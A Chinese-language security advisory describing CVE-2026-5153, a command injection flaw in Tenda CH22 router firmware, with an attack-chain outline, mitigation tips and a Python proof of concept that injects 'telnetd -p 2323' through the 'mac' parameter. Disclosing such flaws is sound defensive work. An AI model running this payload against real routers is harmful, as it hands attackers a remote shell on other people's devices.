IPBUF安全漏洞报告
English
CVE-2026-5153 CVSS 6.3 中危

CVE-2026-5153 Tenda CH22命令注入漏洞

披露日期: 2026-03-30

漏洞信息

漏洞编号
CVE-2026-5153
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda CH22

相关标签

Command InjectionTendaIoTRCECVE-2026-5153

漏洞概述

Tenda CH22路由器固件版本1.0.0.1存在一处命令注入安全漏洞。漏洞根源在于/goform/WriteFacMac接口处理函数对用户输入的'mac'参数缺乏严格的校验机制。攻击者可利用该缺陷,通过网络向目标设备发送精心构造的恶意请求数据,从而在系统后台执行任意操作系统命令,造成敏感信息泄露或设备完全受控。

技术细节

该漏洞源于Tenda CH22路由器固件中Web服务器组件对特定HTTP请求处理的逻辑缺陷。具体受影响的函数是位于/goform/WriteFacMac路径下的FormWriteFacMac,该函数主要负责处理MAC地址的配置写入操作。在实现过程中,开发人员未对HTTP POST请求体中的'mac'参数进行有效的边界检查和特殊字符过滤,直接将其拼接到系统调用函数(如system或popen)中执行。这种不安全的编程方式使得攻击者能够通过注入Shell元字符(例如分号、管道符或反引号)来截断原始命令结构,并附加执行任意恶意的操作系统指令。根据CVSS 3.1向量分析,该漏洞利用复杂度低,攻击网络可达,且需要低权限用户级别。一旦攻击成功,可能导致设备机密性、完整性和可用性全面受损,攻击者可借此获取Root权限控制设备。

攻击链分析

STEP 1
1. 侦察阶段
攻击者扫描网络,识别出运行Tenda CH22固件版本1.0.0.1的设备,并确认其Web管理接口可访问。
STEP 2
2. 利用阶段
攻击者向/goform/WriteFacMac接口发送特制的HTTP POST请求,在'mac'参数中注入恶意的Shell命令(如启动telnet服务)。
STEP 3
3. 执行阶段
由于存在漏洞,后端程序直接将'mac'参数传递给系统Shell执行,导致注入的恶意命令在设备上运行。
STEP 4
4. 控制阶段
攻击者通过建立的Shell连接(如telnet)获取设备访问权限,进一步窃取数据或建立持久化后门。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL setup target_ip = "192.168.0.1" url = f"http://{target_ip}/goform/WriteFacMac" # Malicious payload injecting a command to start telnetd # The payload attempts to close the original argument and inject a new command payload_data = { "mac": "123456; telnetd -p 2323 &" } try: # Send the POST request to the vulnerable endpoint response = requests.post(url, data=payload_data, timeout=5) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check if telnet is running on port 2323.") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")

影响范围

Tenda CH22 1.0.0.1

防御指南

临时缓解措施
建议用户立即断开设备外网连接,仅通过内网访问管理后台。在官方发布修复补丁前,应关闭路由器的远程管理功能,并定期检查已连接设备的异常行为。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表